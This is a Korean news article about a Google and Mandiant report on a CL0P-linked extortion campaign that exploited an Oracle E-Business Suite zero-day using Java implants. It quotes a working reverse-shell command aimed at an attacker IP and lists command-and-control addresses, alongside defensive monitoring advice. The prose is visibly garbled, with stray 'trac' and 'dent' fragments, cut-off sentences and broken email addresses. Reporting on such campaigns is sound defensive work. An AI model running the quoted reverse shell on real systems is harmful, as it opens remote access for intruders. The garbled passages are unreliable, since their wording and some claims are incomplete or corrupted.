구글은 고객 데이터가 대량으로 악용된 채 협박 사건이 발생했다고 보고했습니다

구글은 악의적인 공격자들이 대규모 고객 데이터trac을 시도하고 있으며, 이들이 협박 계획에 연루되었다고 밝혔습니다. 구글 위협 인텔리전스와 맨디언트는 이번 공격의 배후에 CL0P 협박 그룹과 연관된 공격자들이 있을 가능성을 trac.

구글의 위협 인텔리전스 그룹(GTIG)과 맨디언트는 오라클의 E-비즈니스 스위트(EBS)의 취약점을 악용한 대규모 협박 캠페인을 적발했습니다. 이 캠페인으로 인해 대량의 고객 데이터가 유출되었습니다. GTIG와 맨디언트는 이 작전이 2025년 9월 29일에 시작되었으며, CL0P라는 협박 브랜드와 연관된 것으로 추정되는 조직이 연루되었다고 밝혔습니다.

구글과 맨디언트가 제로데이 취약점을 공개했습니다 

구글의 보고서에 따르면 공격자들은 여러 조직의 임원들에게 대량의 이메일을 보내 오라클 EBS 환경이 침해당했다고 주장하며 몸값을 지불하지. 

수백 개의 해킹당한 제3자 계정에서 발송된 이메일에는 [email protected] 및 [email protected]이전에 CL0P 데이터 유출 사이트와 연관된

구글과 맨디언트의 공동 조사 결과, 해당 공격 활동은 2025년 7월부터 시작된 것으로 추정되며, 현재 CVE-2025-61882로 trac되는 제로데이 취약점과 관련이 있을 가능성이 있습니다. 일부 사례에서는 공격자들이 피해를 입은 조직으로부터 "상당량의 데이터"를 유출한 것으로 알려졌습니다.

오라클은 악용된 취약점이 7월에 수정되었다고 밝혔지만, 이후 추가적인 취약점을 해결하기 위해 10월 4일에 긴급 업데이트를 발표했습니다. 오라클은 고객들에게 최신 중요 패치 업데이트를 사용할 것을 권고하며, 모든 패치를 최신 상태로 유지하는 것이 보안 침해를 방지하는 데 필수적이라고 강조했습니다.

CL0P라는 이름의 협박 계정은 2020년부터 활동해 왔으며, 과거 FIN11 사이버 범죄 조직과 연관이 있습니다. 이들은 이전에 MOVEit, GoAnywhere, Accellion FTA와 같은 파일 전송 관리 시스템을 표적으로 삼았습니다. 이러한 공격들은 제로데이 취약점을 대량으로 악용하고, 민감한 데이터를 탈취한 후 몇 주 뒤 금전을 갈취하는 유사한 패턴을 보였습니다. 

작성 시점 기준으로 보고서, 이 사건과 관련된 새로운 피해자는dent 의 데이터 유출 사이트에 나타나지 않았습니다. 

복잡하고 다단계적인 자바 임플란트

Google 과 Mandiant의 기술 분석에 따르면 공격자들은 원격 코드 실행 및 다단계 Java 임플란트 설치를 위해 UiServlet 및 SyncServlet을 포함한 Oracle EBS 구성 요소를 대상으로 여러 공격 체인을 사용했습니다.

2025년 7월, /OA_HTML/configurator/UiServlet에 대한 HTTP 요청과 관련된 의심스러운 활동이 감지되었습니다. 이러한 의심스러운 활동은 이후 "SCATTERED LAPSUS$ HUNTERS"라는 텔레그램 그룹에서 발견된 또 다른 익스플로잇에서도 확인되었습니다 

유출된 취약점은 서버 측 요청 위조(SSRF), 인증 우회, XSL 템플릿 삽입 등 여러 고급 기술을 사용하여 대상 서버를 제어했습니다.

2025년 8월경, 공격자들은 SyncServlet이라는 또 다른 도구를 사용하여 EBS 데이터베이스 내부에 악성 템플릿을 생성하고 실행하기 시작했습니다. 이 템플릿에는 Base64로 인코딩된 XSL 페이로드가 포함되어 있었으며, 이 페이로드는 Java 기반 악성코드를 메모리에 직접 로드했습니다. 

dent된 악성 프로그램 중에는 공격자가 제어하는 ​​명령 서버에서 2단계 페이로드를 가져오는 다운로더인 GOLDVEIN.JAVA와 추가 공격을 위해 영구적인 Java 서블릿 필터를 설치하는 다층 구조의 SAGE가 있었습니다.

시스템에 침입한 공격자들은 "applmgr"이라는 EBS 계정을 사용하여 시스템을 탐색하고 네트워크 및 시스템 정보를 수집한 다음 더 많은 악성 파일을 설치했습니다. 또한 공격자들은 ip addr, netstat -an, bash -i >& /dev/tcp/200.107.207.26/53 0>&1과 같은 셸 명령어를 사용했습니다.

IP 주소 200.107.207.26과 161.97.99.49가 공격 시도에서dent되었으며, 162.55.17.215:443과 104.194.11.200:443은 GOLDVEIN.JAVA 페이로드의 명령 및 제어 서버로 나열되었습니다.

GTIG는 이번 작전을 특정 알려진 그룹과 공식적으로 연관시키지는 않았지만, 이번 캠페인은 금전적 이득을 목적으로 하는 사이버 범죄 그룹인 FIN11과 유사점을 보입니다. FIN11은 이전에 CL0P 랜섬웨어 및 대규모 데이터 탈취 작전과 연관된 바 있습니다. 

맨디언트는 또한 협박 이메일을 보내는 데 사용된 해킹된 계정 중 하나가 이전에 FIN11 관련 공격에 사용된 적이 있다고 지적했습니다.

사용자 여러분께서는 EBS 데이터베이스 테이블 XDO_TEMPLATES_B 및 XDO_LOBS, 특히 이름이 "TMP" 또는 "DEF"로 시작하는 테이블에 대해 주의를 기울여 주시고, 추가적인 데이터 탈취를 방지하기 위해 EBS 서버에서 외부 인터넷 트래픽을 차단해 주시기 바랍니다.

또한 해당 기관들은 /OA_HTML/SyncServlet 및 /OA_HTML/configurator/UiServlet과 같은 엔드포인트에 대한 HTTP 요청을 면밀히 모니터링하고 메모리 덤프를 분석하여 메모리 내 Java 페이로드의 증거를 찾을 것을 권장합니다.

구글은 CL0P와 연관된 그룹들이 제로데이 취약점 확보에 자원을 계속 투입할 가능성이 매우 높다고 경고했습니다.